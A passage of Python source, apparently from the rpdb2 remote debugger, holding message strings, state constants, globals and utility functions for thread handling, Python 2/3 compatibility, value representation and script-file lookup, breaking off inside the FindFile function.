STR_NO_SUCH_BREAKPOINT = "Breakpoint not found."
STR_THREAD_NOT_FOUND = "Thread was not found."
STR_NO_THREADS_FOUND = "No threads were found."
STR_THREAD_NOT_BROKEN = "Thread is running."
STR_THREAD_FOCUS_SET = "Focus was set to chosen thread."
STR_ILEGAL_ANALYZE_MODE_ARG = "Argument is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ILEGAL_ANALYZE_MODE_CMD = "Command is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ANALYZE_MODE_TOGGLE = "Analyze mode was set to: %s."
STR_BAD_ARGUMENT = "Bad Argument."
STR_BAD_SYNTAX = 'Unknown syntax: %s\nDid you forget to use the exec or eval console commands?'
STR_PSYCO_WARNING = "The psyco module was detected. The debugger is incompatible with the psyco module and will not function correctly as long as the psyco module is imported and used."
STR_CONFLICTING_MODULES = "The modules: %s, which are incompatible with the debugger were detected and can possibly cause the debugger to fail."
STR_SIGNAL_INTERCEPT = "The signal %s(%d) was intercepted inside debugger tracing logic. It will be held pending until the debugger continues. Any exceptions raised by the handler will be ignored!"
STR_SIGNAL_EXCEPTION = "Exception %s raised by handler of signal %s(%d) inside debugger tracing logic was ignored!"
STR_DEBUGGEE_TERMINATED = "Debuggee has terminated."
STR_DEBUGGEE_NOT_BROKEN = "Debuggee has to be waiting at break point to complete this command."
STR_DEBUGGER_HAS_BROKEN = "Debuggee is waiting at break point for further commands."
STR_ALREADY_ATTACHED = "Already attached. Detach from debuggee and try again."
STR_NOT_ATTACHED = "Not attached to any script. Attach to a script and try again."
STR_COMMUNICATION_FAILURE = "Failed to communicate with debugged script."
STR_ERROR_OTHER = "Command returned the following error:\n%(type)s, %(value)s.\nPlease check stderr for stack trace and report to support."
STR_BAD_MBCS_PATH = "The debugger can not launch the script since the path to the Python executable or the debugger scripts can not be encoded into the default system code page. Please check the settings of 'Language for non-Unicode programs' in the Advanced tab of the Windows Regional and Language Options dialog."
STR_LOST_CONNECTION = "Lost connection to debuggee."
STR_FIREWALL_BLOCK = "A firewall is blocking the local communication chanel (socket) that is required between the debugger and the debugged script. Please make sure that the firewall allows that communication."
STR_BAD_VERSION = "A debuggee was found with incompatible debugger version %(value)s."
STR_BAD_VERSION2 = "While attempting to find the specified debuggee at least one debuggee was found that uses incompatible version of RPDB2."
STR_UNEXPECTED_DATA = "Unexpected data received."
STR_ACCESS_DENIED = "While attempting to find debuggee, at least one debuggee denied connection because of mismatched passwords. Please verify your password."
STR_ACCESS_DENIED2 = "Communication is denied because of un-matching passwords."
STR_ENCRYPTION_EXPECTED = "While attempting to find debuggee, at least one debuggee denied connection since it accepts encrypted connections only."
STR_ENCRYPTION_EXPECTED2 = "Debuggee will only talk over an encrypted channel."
STR_DECRYPTION_FAILURE = "Bad packet was received by the debuggee."
STR_DEBUGGEE_NO_ENCRYPTION = "Debuggee does not support encrypted mode. Either install the python-crypto package on the debuggee machine or allow unencrypted connections."
STR_RANDOM_PASSWORD = "Password has been set to a random password."
STR_PASSWORD_INPUT = "Please type a password:"
STR_PASSWORD_CONFIRM = "Password has been set."
STR_PASSWORD_NOT_SUPPORTED = "The --pwd flag is only supported on NT systems."
STR_PASSWORD_MUST_BE_SET = "A password should be set to secure debugger client-server communication."
STR_BAD_DATA = "Bad data received from debuggee."
STR_BAD_FILE_DATA = "Bad data received from file."
STR_ATTACH_FAILED = "Failed to attach"
STR_ATTACH_FAILED_NAME = "Failed to attach to '%s'."
STR_ATTACH_CRYPTO_MODE = "Debug Channel is%s encrypted."
STR_ATTACH_CRYPTO_MODE_NOT = "NOT"
STR_ATTACH_SUCCEEDED = "Successfully attached to '%s'."
STR_ATTEMPTING_TO_STOP = "Requesting script to stop."
STR_ATTEMPTING_TO_DETACH = "Detaching from script..."
STR_DETACH_SUCCEEDED = "Detached from script."
STR_DEBUGGEE_UNKNOWN = "Failed to find script."
STR_MULTIPLE_DEBUGGEES = "WARNING: There is more than one debuggee '%s'."
MSG_ERROR_HOST_TEXT = """The debugger was not able to set the host to '%s'.
The following error was returned:
%s"""
STR_SOURCE_NOT_FOUND = "Failed to get source from debuggee."
STR_SCRIPTS_CONNECTING = "Connecting to '%s'..."
STR_SCRIPTS_NO_SCRIPTS = "No scripts to debug on '%s'"
STR_SCRIPTS_TO_DEBUG = """Scripts to debug on '%s':
pid name
--------------------------"""
STR_STACK_TRACE = """Stack trace for thread %d:
Frame File Name Line Function
------------------------------------------------------------------------------"""
STR_SOURCE_LINES = """Source lines for thread %d from file '%s':
"""
STR_ACTIVE_THREADS = """List of active threads known to the debugger:
No Tid Name State
-----------------------------------------------"""
STR_BREAKPOINTS_LIST = """List of breakpoints:
Id State Line Filename-Scope-Condition-Encoding
------------------------------------------------------------------------------"""
STR_BREAKPOINTS_TEMPLATE = """ %2d %-8s %5d %s
%s
%s
%s"""
STR_ENCRYPTION_SUPPORT_ERROR = "Encryption is not supported since the python-crypto package was not found. Either install the python-crypto package or allow unencrypted connections."
STR_PASSWORD_NOT_SET = 'Password is not set.'
STR_PASSWORD_SET = 'Password is set to: "%s"'
STR_PASSWORD_BAD = 'The password should begin with a letter and continue with any combination of digits, letters or underscores (\'_\'). Only English characters are accepted for letters.'
STR_ENCRYPT_MODE = 'Force encryption mode: %s'
STR_REMOTE_MODE = 'Allow remote machines mode: %s'
STR_ENCODING_MODE = 'Encoding is set to: %s'
STR_ENCODING_MODE_SET = 'Encoding was set to: %s'
STR_ENCODING_BAD = 'The specified encoding was not recognized by the debugger.'
STR_ENVIRONMENT = 'The current environment mapping is:'
STR_ENVIRONMENT_EMPTY = 'The current environment mapping is not set.'
STR_SYNCHRONICITY_BAD = "Can not process command when thread is running unless synchronicity mode is turned on. Type 'help synchro' at the command prompt for more information."
STR_SYNCHRONICITY_MODE = 'The synchronicity mode is set to: %s'
STR_TRAP_MODE = 'Trap unhandled exceptions mode is set to: %s'
STR_TRAP_MODE_SET = "Trap unhandled exceptions mode was set to: %s."
STR_FORK_MODE = "Fork mode is set to: %s, %s."
STR_FORK_MODE_SET = "Fork mode was set to: %s, %s."
STR_LOCAL_NAMESPACE_WARNING = 'Debugger modifications to the original bindings of the local namespace of this frame will be committed before the execution of the next statement of the frame. Any code using these variables executed before that point will see the original values.'
STR_WARNING = 'Warning: %s'
STR_MAX_NAMESPACE_WARNING_TITLE = 'Namespace Warning'
STR_MAX_NAMESPACE_WARNING_TYPE = '*** WARNING ***'
STR_MAX_NAMESPACE_WARNING_MSG = 'Number of items exceeds capacity of namespace browser.'
STR_MAX_EVALUATE_LENGTH_WARNING = 'Output length exeeds maximum capacity.'
FORK_CHILD = 'child'
FORK_PARENT = 'parent'
FORK_MANUAL = 'manual'
FORK_AUTO = 'auto'
ENCRYPTION_ENABLED = 'encrypted'
ENCRYPTION_DISABLED = 'plain-text'
STATE_ENABLED = 'enabled'
STATE_DISABLED = 'disabled'
BREAKPOINTS_FILE_EXT = '.bpl'
PYTHON_FILE_EXTENSION = '.py'
PYTHONW_FILE_EXTENSION = '.pyw'
PYTHONW_SO_EXTENSION = '.so'
PYTHON_EXT_LIST = ['.py', '.pyw', '.pyc', '.pyd', '.pyo', '.so']
MODULE_SCOPE = '?'
MODULE_SCOPE2 = '<module>'
BLENDER_SOURCE_NOT_AVAILABLE = as_unicode('Blender script source code is not available.')
SOURCE_NOT_AVAILABLE = as_unicode('Source code is not available.')
SCOPE_SEP = '.'
BP_FILENAME_SEP = ':'
BP_EVAL_SEP = ','
DEBUGGER_FILENAME = 'rpdb2.py'
THREADING_FILENAME = 'threading.py'
STR_STATE_BROKEN = 'waiting at break point'
STATE_BROKEN = 'broken'
STATE_RUNNING = 'running'
STATE_ANALYZE = 'analyze'
STATE_DETACHED = 'detached'
STATE_DETACHING = 'detaching'
STATE_SPAWNING = 'spawning'
STATE_ATTACHING = 'attaching'
DEFAULT_NUMBER_OF_LINES = 20
DICT_KEY_TID = 'tid'
DICT_KEY_STACK = 'stack'
DICT_KEY_CODE_LIST = 'code_list'
DICT_KEY_CURRENT_TID = 'current tid'
DICT_KEY_BROKEN = 'broken'
DICT_KEY_BREAKPOINTS = 'breakpoints'
DICT_KEY_LINES = 'lines'
DICT_KEY_FILENAME = 'filename'
DICT_KEY_FIRST_LINENO = 'first_lineno'
DICT_KEY_FRAME_LINENO = 'frame_lineno'
DICT_KEY_EVENT = 'event'
DICT_KEY_EXPR = 'expr'
DICT_KEY_NAME = 'name'
DICT_KEY_REPR = 'repr'
DICT_KEY_IS_VALID = 'fvalid'
DICT_KEY_TYPE = 'type'
DICT_KEY_SUBNODES = 'subnodes'
DICT_KEY_N_SUBNODES = 'n_subnodes'
DICT_KEY_ERROR = 'error'
RPDB_EXEC_INFO = as_unicode('rpdb_exception_info')
MODE_ON = 'ON'
MODE_OFF = 'OFF'
ENCODING_UTF8_PREFIX_1 = '\xef\xbb\xbf'
ENCODING_SOURCE = '# -*- coding: %s -*-\n'
ENCODING_AUTO = as_unicode('auto')
ENCODING_RAW = as_unicode('raw')
ENCODING_RAW_I = as_unicode('__raw')
MAX_EVALUATE_LENGTH = 256 * 1024
MAX_NAMESPACE_ITEMS = 1024
MAX_SORTABLE_LENGTH = 256 * 1024
REPR_ID_LENGTH = 4096
MAX_NAMESPACE_WARNING = {
DICT_KEY_EXPR: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_NAME: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_REPR: STR_MAX_NAMESPACE_WARNING_MSG,
DICT_KEY_IS_VALID: False,
DICT_KEY_TYPE: STR_MAX_NAMESPACE_WARNING_TYPE,
DICT_KEY_N_SUBNODES: 0
}
MAX_EVENT_LIST_LENGTH = 1000
EVENT_EXCLUDE = 'exclude'
EVENT_INCLUDE = 'include'
INDEX_TABLE_SIZE = 100
DISPACHER_METHOD = 'dispatcher_method'
CONFLICTING_MODULES = ['psyco', 'pdb', 'bdb', 'doctest']
XML_DATA = """<?xml version='1.0'?>
<methodCall>
<methodName>dispatcher_method</methodName>
<params>
<param>
<value><string>%s</string></value>
</param>
</params>
</methodCall>""" % RPDB_COMPATIBILITY_VERSION
N_WORK_QUEUE_THREADS = 8
DEFAULT_PATH_SUFFIX_LENGTH = 55
ELLIPSIS_UNICODE = as_unicode('...')
ELLIPSIS_BYTES = as_bytes('...')
ERROR_NO_ATTRIBUTE = 'Error: No attribute.'
g_server_lock = threading.RLock()
g_server = None
g_debugger = None
g_fScreen = False
g_fDefaultStd = True
#
# In debug mode errors and tracebacks are printed to stdout
#
g_fDebug = False
#
# Lock for the traceback module to prevent it from interleaving
# output from different threads.
#
g_traceback_lock = threading.RLock()
g_source_provider_aux = None
g_lines_cache = {}
g_initial_cwd = []
g_error_mapping = {
socket.error: STR_COMMUNICATION_FAILURE,
CConnectionException: STR_LOST_CONNECTION,
FirewallBlock: STR_FIREWALL_BLOCK,
BadVersion: STR_BAD_VERSION,
UnexpectedData: STR_UNEXPECTED_DATA,
SpawnUnsupported: STR_SPAWN_UNSUPPORTED,
UnknownServer: STR_DEBUGGEE_UNKNOWN,
UnsetPassword: STR_PASSWORD_MUST_BE_SET,
EncryptionNotSupported: STR_DEBUGGEE_NO_ENCRYPTION,
EncryptionExpected: STR_ENCRYPTION_EXPECTED,
DecryptionFailure: STR_DECRYPTION_FAILURE,
AuthenticationBadData: STR_ACCESS_DENIED,
AuthenticationFailure: STR_ACCESS_DENIED,
BadMBCSPath: STR_BAD_MBCS_PATH,
AlreadyAttached: STR_ALREADY_ATTACHED,
NotAttached: STR_NOT_ATTACHED,
DebuggerNotBroken: STR_DEBUGGEE_NOT_BROKEN,
NoThreads: STR_NO_THREADS,
NoExceptionFound: STR_EXCEPTION_NOT_FOUND,
}
#
# These globals are related to handling the os.fork() os._exit() and exec
# pattern.
#
g_forkpid = None
g_forktid = None
g_fignorefork = False
g_exectid = None
g_execpid = None
g_fos_exit = False
#
# To hold a reference to __main__ to prevent its release if an unhandled
# exception is raised.
#
g_module_main = None
g_found_conflicting_modules = []
g_fignore_atexit = False
g_ignore_broken_pipe = 0
#
# Unicode version of path names that do not encode well witn the windows
# 'mbcs' encoding. This dict is used to work with such path names on
# windows.
#
g_found_unicode_files = {}
g_frames_path = {}
g_signal_handlers = {}
g_signals_pending = []
#g_profile = None
g_fFirewallTest = True
if is_py3k():
g_safe_base64_to = bytes.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = bytes.maketrans(as_bytes('_-#'), as_bytes('/+='))
else:
g_safe_base64_to = string.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = string.maketrans(as_bytes('_-#'), as_bytes('/+='))
g_alertable_waiters = {}
g_builtins_module = sys.modules.get('__builtin__', sys.modules.get('builtins'))
#
# ---------------------------- General Utils ------------------------------
#
def job_wrapper(event, foo, *args, **kwargs):
try:
#print_debug('Thread %d doing job %s' % (thread.get_ident(), foo.__name__))
foo(*args, **kwargs)
finally:
event.set()
def send_job(tid, timeout, foo, *args, **kwargs):
#
# Attempt to send job to thread tid.
# Will throw KeyError if thread tid is not available for jobs.
#
(lock, jobs) = g_alertable_waiters[tid]
event = threading.Event()
f = lambda: job_wrapper(event, foo, *args, **kwargs)
jobs.append(f)
try:
lock.acquire()
lock_notify_all(lock)
finally:
lock.release()
safe_wait(event, timeout)
def alertable_wait(lock, timeout = None):
jobs = []
tid = thread.get_ident()
g_alertable_waiters[tid] = (lock, jobs)
try:
safe_wait(lock, timeout)
while len(jobs) != 0:
job = jobs.pop(0)
try:
job()
except:
pass
if len(jobs) == 0:
time.sleep(0.1)
finally:
del g_alertable_waiters[tid]
def safe_wait(lock, timeout = None):
#
# workaround windows bug where signal handlers might raise exceptions
# even if they return normally.
#
while True:
try:
t0 = time.time()
return lock.wait(timeout)
except:
if timeout == None:
continue
timeout -= (time.time() - t0)
if timeout <= 0:
return
#
# The following code is related to the ability of the debugger
# to work both on Python 2.5 and 3.0.
#
def lock_notify_all(lock):
try:
if is_py3k():
return lock.notify_all()
except AttributeError:
pass
return lock.notifyAll()
def event_is_set(event):
try:
if is_py3k():
return event.is_set()
except AttributeError:
pass
return event.isSet()
def thread_set_daemon(thread, fdaemon):
try:
if is_py3k():
return thread.set_daemon(fdaemon)
except AttributeError:
pass
return thread.setDaemon(fdaemon)
def thread_is_alive(thread):
try:
if is_py3k():
return thread.is_alive()
except AttributeError:
pass
return thread.isAlive()
def thread_set_name(thread, name):
try:
if is_py3k():
return thread.set_name(name)
except AttributeError:
pass
return thread.setName(name)
def thread_get_name(thread):
try:
if is_py3k():
return thread.get_name()
except AttributeError:
pass
return thread.getName()
def current_thread():
try:
if is_py3k():
return threading.current_thread()
except AttributeError:
pass
return threading.currentThread()
class _stub_type:
pass
def _rpdb2_bytes(s, e):
return s.encode(e)
if not hasattr(g_builtins_module, 'unicode'):
unicode = _stub_type
if not hasattr(g_builtins_module, 'long'):
long = _stub_type
if not hasattr(g_builtins_module, 'str8'):
str8 = _stub_type
if not hasattr(g_builtins_module, 'bytearray'):
bytearray = _stub_type
if not hasattr(g_builtins_module, 'bytes'):
bytes = _stub_type
#
# Pickle on Python 2.5 should know how to handle byte strings
# that arrive from Python 3.0 over sockets.
#
g_builtins_module.bytes = _rpdb2_bytes
if is_py3k():
class sets:
Set = _stub_type
BaseSet = _stub_type
ImmutableSet = _stub_type
if sys.version_info[:2] <= (2, 3):
set = sets.Set
def _raw_input(s):
if is_py3k():
return input(s)
i = raw_input(s)
i = as_unicode(i, detect_encoding(sys.stdin), fstrict = True)
return i
def _print(s, f = sys.stdout, feol = True):
s = as_unicode(s)
encoding = detect_encoding(f)
s = as_bytes(s, encoding, fstrict = False)
s = as_string(s, encoding)
if feol:
f.write(s + '\n')
else:
f.write(s)
def detect_encoding(file):
try:
encoding = file.encoding
if encoding == None:
return detect_locale()
except:
return detect_locale()
try:
codecs.lookup(encoding)
return encoding
except:
pass
if encoding.lower().startswith('utf_8'):
return 'utf-8'
return 'ascii'
def detect_locale():
encoding = locale.getdefaultlocale()[1]
if encoding == None:
return 'ascii'
try:
codecs.lookup(encoding)
return encoding
except:
pass
if encoding.lower().startswith('utf_8'):
return 'utf-8'
return 'ascii'
def class_name(c):
s = safe_str(c)
if "'" in s:
s = s.split("'")[1]
assert(s.startswith(__name__ + '.'))
return s
def clip_filename(path, n = DEFAULT_PATH_SUFFIX_LENGTH):
suffix = calc_suffix(path, n)
if not suffix.startswith('...'):
return suffix
index = suffix.find(os.sep)
if index == -1:
return suffix
clip = '...' + suffix[index:]
return clip
def safe_str(x):
try:
return str(x)
except:
return 'N/A'
def safe_repr(x):
try:
return repr(x)
except:
return 'N/A'
def parse_type(t):
rt = safe_repr(t)
if not "'" in rt:
return rt
st = rt.split("'")[1]
return st
def repr_list(pattern, l, length, encoding, is_valid):
length = max(0, length - len(pattern) + 2)
s = ''
index = 0
try:
for i in l:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if type(i) == str and i in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
s += repr_ltd(i, length - len(s), encoding, is_valid)
index += 1
if index < len(l) and len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
if index < len(l) or (index == 1 and pattern[0] == '('):
s += ', '
except AttributeError:
is_valid[0] = False
return as_unicode(pattern % s)
def repr_dict(pattern, d, length, encoding, is_valid):
length = max(0, length - len(pattern) + 2)
s = ''
index = 0
try:
for k in d:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if type(k) == str and k in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
v = d[k]
s += repr_ltd(k, length - len(s), encoding, is_valid)
if len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
s += ': ' + repr_ltd(v, length - len(s), encoding, is_valid)
index += 1
if index < len(d) and len(s) > length:
is_valid[0] = False
if not s.endswith('...'):
s += '...'
break
if index < len(d):
s += ', '
except AttributeError:
is_valid[0] = False
return as_unicode(pattern % s)
def repr_bytearray(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 'bytearray(b' + r[1:] + ')'
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_bytes(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 'b' + r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_str8(s, length, encoding, is_valid):
try:
s = s.decode(encoding)
r = repr_unicode(s, length, is_valid)
return 's' + r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_str(s, length, encoding, is_valid):
try:
s = as_unicode(s, encoding, fstrict = True)
r = repr_unicode(s, length, is_valid)
return r[1:]
except:
#
# If a string is not encoded as utf-8 its repr() will be done with
# the regular repr() function.
#
return repr_str_raw(s, length, is_valid)
def repr_unicode(s, length, is_valid):
index = [2, 1][is_py3k()]
rs = ''
for c in s:
if len(rs) > length:
is_valid[0] = False
rs += '...'
break
if ord(c) < 128:
rs += repr(c)[index: -1]
else:
rs += c
if not "'" in rs:
return as_unicode("u'%s'" % rs)
if not '"' in rs:
return as_unicode('u"%s"' % rs)
return as_unicode("u'%s'" % rs.replace("'", "\\'"))
def repr_str_raw(s, length, is_valid):
if is_unicode(s):
eli = ELLIPSIS_UNICODE
else:
eli = ELLIPSIS_BYTES
if len(s) > length:
is_valid[0] = False
s = s[: length] + eli
return as_unicode(repr(s))
def repr_base(v, length, is_valid):
r = repr(v)
if len(r) > length:
is_valid[0] = False
r = r[: length] + '...'
return as_unicode(r)
def repr_ltd(x, length, encoding, is_valid = [True]):
try:
length = max(0, length)
try:
if isinstance(x, frozenset):
return repr_list('frozenset([%s])', x, length, encoding, is_valid)
if isinstance(x, set):
return repr_list('set([%s])', x, length, encoding, is_valid)
except NameError:
pass
if isinstance(x, sets.Set):
return repr_list('sets.Set([%s])', x, length, encoding, is_valid)
if isinstance(x, sets.ImmutableSet):
return repr_list('sets.ImmutableSet([%s])', x, length, encoding, is_valid)
if isinstance(x, list):
return repr_list('[%s]', x, length, encoding, is_valid)
if isinstance(x, tuple):
return repr_list('(%s)', x, length, encoding, is_valid)
if isinstance(x, dict):
return repr_dict('{%s}', x, length, encoding, is_valid)
if encoding == ENCODING_RAW_I and [True for t in [str, unicode, bytearray, bytes, str8] if t is type(x)]:
return repr_str_raw(x, length, is_valid)
if type(x) is unicode:
return repr_unicode(x, length, is_valid)
if type(x) is bytearray:
return repr_bytearray(x, length, encoding, is_valid)
if type(x) is bytes:
return repr_bytes(x, length, encoding, is_valid)
if type(x) is str8:
return repr_str8(x, length, encoding, is_valid)
if type(x) is str:
return repr_str(x, length, encoding, is_valid)
if [True for t in [bool, int, float, long, type(None)] if t is type(x)]:
return repr_base(x, length, is_valid)
is_valid[0] = False
y = safe_repr(x)[: length]
if len(y) == length:
y += '...'
if encoding == ENCODING_RAW_I:
encoding = 'utf-8'
try:
y = as_unicode(y, encoding, fstrict = True)
return y
except:
pass
encoding = sys.getfilesystemencoding()
y = as_unicode(y, encoding)
return y
except:
print_debug_exception()
return as_unicode('N/A')
def print_debug(_str):
if not g_fDebug:
return
t = time.time()
l = time.localtime(t)
s = time.strftime('%H:%M:%S', l) + '.%03d' % ((t - int(t)) * 1000)
f = sys._getframe(1)
filename = os.path.basename(f.f_code.co_filename)
lineno = f.f_lineno
name = f.f_code.co_name
str = '%s %s:%d in %s: %s' % (s, filename, lineno, name, _str)
_print(str, sys.__stderr__)
def print_debug_exception(fForce = False):
"""
Print exceptions to stdout when in debug mode.
"""
if not g_fDebug and not fForce:
return
(t, v, tb) = sys.exc_info()
print_exception(t, v, tb, fForce)
class CFileWrapper:
def __init__(self, f):
self.m_f = f
def write(self, s):
_print(s, self.m_f, feol = False)
def __getattr__(self, name):
return self.m_f.__getattr__(name)
def print_exception(t, v, tb, fForce = False):
"""
Print exceptions to stderr when in debug mode.
"""
if not g_fDebug and not fForce:
return
try:
g_traceback_lock.acquire()
traceback.print_exception(t, v, tb, file = CFileWrapper(sys.stderr))
finally:
g_traceback_lock.release()
def print_stack():
"""
Print exceptions to stdout when in debug mode.
"""
if g_fDebug == True:
try:
g_traceback_lock.acquire()
traceback.print_stack(file = CFileWrapper(sys.stderr))
finally:
g_traceback_lock.release()
#
# myisfile() is similar to os.path.isfile() but also works with
# Python eggs.
#
def myisfile(path):
try:
mygetfile(path, False)
return True
except:
return False
#
# Read a file even if inside a Python egg.
#
def mygetfile(path, fread_file = True):
if os.path.isfile(path):
if not fread_file:
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'r'
else:
mode = 'rb'
f = open(path, mode)
data = f.read()
f.close()
return data
d = os.path.dirname(path)
while True:
if os.path.exists(d):
break
_d = os.path.dirname(d)
if _d in [d, '']:
raise IOError
d = _d
if not zipfile.is_zipfile(d):
raise IOError
z = zipimport.zipimporter(d)
try:
data = z.get_data(path[len(d) + 1:])
return data
except:
raise IOError
def split_command_line_path_filename_args(command_line):
"""
Split command line to a 3 elements tuple (path, filename, args)
"""
command_line = command_line.strip()
if len(command_line) == 0:
return ('', '', '')
if myisfile(command_line):
(_path, _filename) = split_path(command_line)
return (_path, _filename, '')
if command_line[0] in ['"', "'"]:
_command_line = command_line[1:]
i = _command_line.find(command_line[0])
if i == -1:
(_path, filename) = split_path(_command_line)
return (_path, filename, '')
else:
(_path, filename) = split_path(_command_line[: i])
args = _command_line[i + 1:].strip()
return (_path, filename, args)
else:
i = command_line.find(' ')
if i == -1:
(_path, filename) = split_path(command_line)
return (_path, filename, '')
else:
args = command_line[i + 1:].strip()
(_path, filename) = split_path(command_line[: i])
return (_path, filename, args)
def split_path(path):
(_path, filename) = os.path.split(path)
#
# Make sure path separator (e.g. '/') ends the splitted path if it was in
# the original path.
#
if (_path[-1:] not in [os.path.sep, os.path.altsep]) and \
(path[len(_path): len(_path) + 1] in [os.path.sep, os.path.altsep]):
_path = _path + path[len(_path): len(_path) + 1]
return (_path, filename)
def my_os_path_join(dirname, basename):
if is_py3k() or (type(dirname) == str and type(basename) == str):
return os.path.join(dirname, basename)
encoding = sys.getfilesystemencoding()
if type(dirname) == str:
dirname = dirname.decode(encoding)
if type(basename) == str:
basename = basename.decode(encoding)
return os.path.join(dirname, basename)
def calc_frame_path(frame):
globals_filename = frame.f_globals.get('__file__', None)
filename = frame.f_code.co_filename
if filename.startswith('<'):
if globals_filename == None:
return filename
else:
filename = CalcScriptName(os.path.basename(globals_filename))
if filename in g_frames_path:
return g_frames_path[filename]
if globals_filename != None:
dirname = os.path.dirname(globals_filename)
basename = os.path.basename(filename)
path = my_os_path_join(dirname, basename)
if os.path.isabs(path):
abspath = my_abspath(path)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
try:
abspath = FindFile(path, fModules = True)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
except IOError:
pass
if os.path.isabs(filename):
abspath = my_abspath(filename)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
try:
abspath = FindFile(filename, fModules = True)
lowered = winlower(abspath)
g_frames_path[filename] = lowered
return lowered
except IOError:
lowered = winlower(filename)
return lowered
def my_abspath(path):
"""
We need our own little version of os.path.abspath since the original
code imports modules in the 'nt' code path which can cause our debugger
to deadlock in unexpected locations.
"""
if path[:1] == '<':
#
# 'path' may also be '<stdin>' in which case it is left untouched.
#
return path
if os.name == 'nt':
return my_abspath1(path)
return os.path.abspath(path)
#
# MOD
#
def my_abspath1(path):
"""
Modification of ntpath.abspath() that avoids doing an import.
"""
if path:
try:
path = _getfullpathname(path)
except WindowsError:
pass
else:
try:
path = getcwd()
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
path = getcwdu()
np = os.path.normpath(path)
if (len(np) >= 2) and (np[1:2] == ':'):
np = np[:1].upper() + np[1:]
return np
def IsPythonSourceFile(path):
if path.endswith(PYTHON_FILE_EXTENSION):
return True
if path.endswith(PYTHONW_FILE_EXTENSION):
return True
path = g_found_unicode_files.get(path, path)
for lineno in range(1, 10):
line = get_source_line(path, lineno)
if line.startswith('#!') and 'python' in line:
return True
if is_py3k():
#
# py3k does not have compiler.parseFile, so return
# True anyway...
#
return True
try:
compiler.parseFile(path)
return True
except:
return False
def CalcModuleName(filename):
_basename = os.path.basename(filename)
(modulename, ext) = os.path.splitext(_basename)
if ext in PYTHON_EXT_LIST:
return modulename
return _basename
def CalcScriptName(filename, fAllowAnyExt = True):
if filename.endswith(PYTHON_FILE_EXTENSION):
return filename
if filename.endswith(PYTHONW_FILE_EXTENSION):
return filename
if filename.endswith(PYTHONW_SO_EXTENSION):
scriptname = filename[:-3] + PYTHON_FILE_EXTENSION
return scriptname
if filename[:-1].endswith(PYTHON_FILE_EXTENSION):
scriptname = filename[:-1]
return scriptname
if fAllowAnyExt:
return filename
scriptname = filename + PYTHON_FILE_EXTENSION
return scriptname
def FindModuleDir(module_name):
if module_name == '':
raise IOError
dot_index = module_name.rfind('.')
if dot_index != -1:
parent = module_name[: dot_index]
child = module_name[dot_index + 1:]
else:
parent = ''
child = module_name
m = sys.modules[module_name]
if not hasattr(m, '__file__') or m.__file__ == None:
parent_dir = FindModuleDir(parent)
module_dir = my_os_path_join(parent_dir, winlower(child))
return module_dir
if not os.path.isabs(m.__file__):
parent_dir = FindModuleDir(parent)
module_dir = my_os_path_join(parent_dir, winlower(child))
return module_dir
(root, ext) = os.path.splitext(m.__file__)
if root.endswith('__init__'):
root = os.path.dirname(root)
abspath = my_abspath(root)
lowered = winlower(abspath)
return lowered
def FindFileAsModule(filename):
lowered = winlower(filename)
(root, ext) = os.path.splitext(lowered)
root_dotted = root.replace('\\', '.').replace('/', '.').replace(':', '.')
match_list = []
for (module_name, m) in list(sys.modules.items()):
lowered_module_name = winlower(module_name)
if (root_dotted + '.').startswith(lowered_module_name + '.'):
match_list.append((len(module_name), module_name))
if lowered_module_name == root_dotted:
break
match_list.sort()
match_list.reverse()
for (matched_len, matched_module) in match_list:
try:
module_dir = FindModuleDir(matched_module)
except IOError:
continue
suffix = root[matched_len:]
if suffix == '':
path = module_dir + ext
else:
path = my_os_path_join(module_dir, suffix.strip('\\')) + ext
scriptname = CalcScriptName(path, fAllowAnyExt = False)
if myisfile(scriptname):
return scriptname
#
# Check .pyw files
#
scriptname += 'w'
if scriptname.endswith(PYTHONW_FILE_EXTENSION) and myisfile(scriptname):
return scriptname
raise IOError
def getcwd():
try:
return os.getcwd()
except UnicodeDecodeError:
print_debug_exception(True)
raise
def getcwdu():
if hasattr(os, 'getcwdu'):
return os.getcwdu()
return getcwd()
def FindFile(
filename,
sources_paths = [],
fModules = False,
fAllowAnyExt = True
):
"""
FindFile looks for the full path of a script in a rather non-strict
and human like behavior.
ENCODING:
filename should be either Unicode or encoded with sys.getfilesystemencoding()!
Returned value is encoded with sys.getfilesystemencoding().
It will always look for .py or .pyw files even if a .pyc or no
extension is given.
1. It will check against loaded modules if asked.
1. full path (if exists).
2. sources_paths.
2. current path.
3. PYTHONPATH
4. PATH
"""
if filename in g_found_unicode_files:
return filename
if filename.startswith('<'):
raise IOError
filename = filename.strip('\'"')
filename = os.path.expanduser(filename)
if fModules and not (os.path.isabs(filename) or filename.startswith('.')):
try:
return winlower(FindFileAsModule(filename))
except IOError:
pass
if fAllowAnyExt:
try:
abspath = FindFile(
filename,
sources_paths,
fModules = False,
fAllowAnyExt = False
)
return abspath
except IOError:
pass
if os.path.isabs(filename) or filename.startswith('.'):
try:
scriptname = None
